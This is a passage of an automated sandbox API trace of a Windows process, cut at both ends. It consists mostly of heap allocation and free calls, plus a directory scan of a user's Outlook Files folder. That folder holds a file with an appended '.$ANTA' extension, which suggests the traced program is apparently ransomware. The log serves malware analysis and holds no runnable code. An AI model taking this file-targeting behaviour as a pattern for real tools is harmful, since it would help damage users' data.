hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0085.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0085.675] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0085.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0085.675] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0085.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0085.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0085.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0085.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0085.676] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0085.676] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ba0 [0085.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0085.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0085.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0085.676] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0085.676] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xff31290d, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xff31290d, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca568, cFileName=".", cAlternateFileName="")) returned 0x41ac040 [0085.677] FindNextFileW (in: hFindFile=0x41ac040, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xff31290d, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xff31290d, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca568, cFileName="..", cAlternateFileName="")) returned 1 [0085.677] FindNextFileW (in: hFindFile=0x41ac040, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeb9157d, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfeb9157d, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xff31290d, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x42410, dwReserved0=0x0, dwReserved1=0x43ca568, cFileName="kkcie@kdj.kd.pst.$ANTA", cAlternateFileName="KKCIE@~1.$AN")) returned 1 [0085.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0085.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0085.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0085.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0085.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0085.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0085.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0085.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0085.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0085.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0085.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.677] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0085.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0085.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0085.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0085.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.677] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.677] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.677] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0085.678] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0085.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0085.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0085.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0085.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0085.678] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0085.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0085.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0085.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.678] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0085.678] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0085.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0085.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0085.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0085.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0085.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0085.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0085.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca748 [0085.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0085.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0085.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0085.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0085.679] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.679] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0085.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0085.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0085.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0085.679] FindNextFileW (in: hFindFile=0x41ac040, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e25d0, ftCreationTime.dwHighDateTime=0x144ed98, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e25d0, ftLastWriteTime.dwLowDateTime=0x43ea2e0, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="", cAlternateFileName="﫠мńဓ+\x10")) returned 0 [0085.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0085.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0085.679] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0085.679] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0085.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0085.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0085.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0085.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0085.680] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0085.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0085.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0085.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0085.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0085.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0085.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0085.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0085.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0085.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0085.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0085.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0085.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0085.680] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0085.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0085.680] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0085.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0085.680] FindClose (in: hFindFile=0x41ac040 | out: hFindFile=0x41ac040) returned 1 [0085.680] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0085.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0085.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0085.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0085.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0085.681] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0085.681] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0085.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0085.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0085.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0085.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0085.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4c0 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca598 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca748 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0085.681] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0085.681] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0085.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0085.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0085.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0085.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0085.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0085.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0085.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0085.682] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0085.682] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0085.683] HeapFree (in: hHeap=0x1780000, 